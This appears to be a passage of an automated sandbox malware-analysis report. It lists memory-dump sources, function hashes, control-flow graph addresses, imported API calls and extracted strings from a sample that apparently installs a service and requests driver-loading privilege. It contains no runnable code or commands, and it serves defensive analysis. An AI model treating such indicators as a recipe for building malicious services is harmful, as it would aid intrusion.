                      • Instruction ID: 3a377877cd8078b6634585cb2604738ae56d4b65092015cb43d5807360f93ce1
                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                      • Instruction Fuzzy Hash: 1A819D21F4C64386FB54ABEDA8412BD3B90AF857C0F948535EB0D87B96DE3CE9468700

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                      • String ID: WordpadFilter.db
                      • API String ID: 868324331-3647581008
                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                      • Instruction ID: 5cdbd824656f3259427802445252922ca793f6a5c3871059f5cc9b4b33f6d82a
                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                      • Instruction Fuzzy Hash: 59318C32B55B4189E700CFA5E8502AD77B5EB88788F558636EF8C13B48EF38D196C740

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 196 7ff8bfb211b0-7ff8bfb21207 197 7ff8bfb21209-7ff8bfb21222 call 7ff8bfb31490 196->197 198 7ff8bfb2124b-7ff8bfb2124e 196->198 209 7ff8bfb2123e 197->209 210 7ff8bfb21224-7ff8bfb21227 197->210 199 7ff8bfb214b8-7ff8bfb214bf 198->199 200 7ff8bfb21254-7ff8bfb21280 198->200 204 7ff8bfb214c3-7ff8bfb214ea call 7ff8bfb21b70 199->204 202 7ff8bfb21282-7ff8bfb2128f 200->202 203 7ff8bfb212f6-7ff8bfb21335 call 7ff8bfb21b90 call 7ff8bfb30a50 200->203 206 7ff8bfb214f1-7ff8bfb214f6 call 7ff8bfb21a40 202->206 207 7ff8bfb21295-7ff8bfb2129c 202->207 231 7ff8bfb21340-7ff8bfb213cb 203->231 221 7ff8bfb214f7-7ff8bfb214ff call 7ff8bfb21110 206->221 213 7ff8bfb2129e-7ff8bfb212a5 207->213 214 7ff8bfb212c7-7ff8bfb212cf call 7ff8bfb21b90 207->214 217 7ff8bfb21241-7ff8bfb21246 209->217 216 7ff8bfb21229-7ff8bfb2123c call 7ff8bfb31490 210->216 210->217 220 7ff8bfb212ab-7ff8bfb212b3 call 7ff8bfb21b90 213->220 213->221 233 7ff8bfb212d2-7ff8bfb212f1 call 7ff8bfb30e10 214->233 216->209 216->210 217->198 235 7ff8bfb212b9-7ff8bfb212c5 220->235 236 7ff8bfb214eb-7ff8bfb214f0 call 7ff8bfb279cc 220->236 231->231 234 7ff8bfb213d1-7ff8bfb213da 231->234 233->203 238 7ff8bfb213e0-7ff8bfb21402 234->238 235->233 236->206 241 7ff8bfb21411-7ff8bfb2142c 238->241 242 7ff8bfb21404-7ff8bfb2140e 238->242 241->238 244 7ff8bfb2142e-7ff8bfb21436 241->244 242->241 245 7ff8bfb21498-7ff8bfb214a6 244->245 246 7ff8bfb21438-7ff8bfb2143b 244->246 247 7ff8bfb214a8-7ff8bfb214b5 call 7ff8bfb21bcc 245->247 248 7ff8bfb214b6 245->248 249 7ff8bfb21440-7ff8bfb21449 246->249 247->248 248->204 251 7ff8bfb2144b-7ff8bfb21453 249->251 252 7ff8bfb21455-7ff8bfb21465 249->252 251->252 254 7ff8bfb21470-7ff8bfb21496 252->254 255 7ff8bfb21467-7ff8bfb2146e 252->255 254->245 254->249 255->254
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                      • String ID:
                      • API String ID: 73155330-0
                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                      • Instruction ID: c290f0021de4020b0f61869d6c596d20242a5e26776e8677cfd4775d995a8677
                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                      • Instruction Fuzzy Hash: 1E815823A1979246E6118B7998401BDAB94FF56BC4F548335EFAD63792EF3CE0928700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                      • String ID:
                      • API String ID: 3526400053-0
                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                      • API String ID: 3408796845-4213300970
                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                      • String ID: ampStopSingletone: logging ended
                      • API String ID: 2048888615-3533855269
                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ErrorLastManagerOpen$FileModuleName
                      • String ID: /remove$/service$vseamps
                      • API String ID: 67513587-3839141145
                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                      APIs
                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressProc$Load$Library
                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                      • API String ID: 3981747205-232180764
                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                      • String ID:
                      • API String ID: 4284112124-0
                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                      • String ID: vseamps
                      • API String ID: 3693165506-3944098904
                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                      APIs
                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                      • API String ID: 514040917-4022980321
                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                      • String ID:
                      • API String ID: 2057259594-0
                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                      • String ID:
                      • API String ID: 3103264659-0
                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                      • String ID:
                      • API String ID: 3140674995-0
                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                      • Instruction ID: 9e728d2b09ae146ae9141eb4d1862850ecde43074f135778e3b783d4f2550ac2
                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                      • Instruction Fuzzy Hash: 95315072649B818AEB608FA8E8807ED7365FB84788F44403ADB4E47B94DF3CD548C710
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                      • String ID:
                      • API String ID: 1269745586-0
                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                      • String ID:
                      • API String ID: 1239891234-0
                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                      • Instruction ID: 5feb025dc2b54e9e71ea3a15487d8d182d65a91aa8303a9e74abda2d0d3d3ede
                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                      • Instruction Fuzzy Hash: 65317132658B8186EB60CF69E8403AE77A0FB88798F900535EB9D43B55DF3CD159CB00
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                      • String ID:
                      • API String ID: 1445889803-0
                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                      APIs
                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$AllocProcess
                      • String ID:
                      • API String ID: 1617791916-0
                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$CaptureContext
                      • String ID:
                      • API String ID: 2202868296-0
                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
